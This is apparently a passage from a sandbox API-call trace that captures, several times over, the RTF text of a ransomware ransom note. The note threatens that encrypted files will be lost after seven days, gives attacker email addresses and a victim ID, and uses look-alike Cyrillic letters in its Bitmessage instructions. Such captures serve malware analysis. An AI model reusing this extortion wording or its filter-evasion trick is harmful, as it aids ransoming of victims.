\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 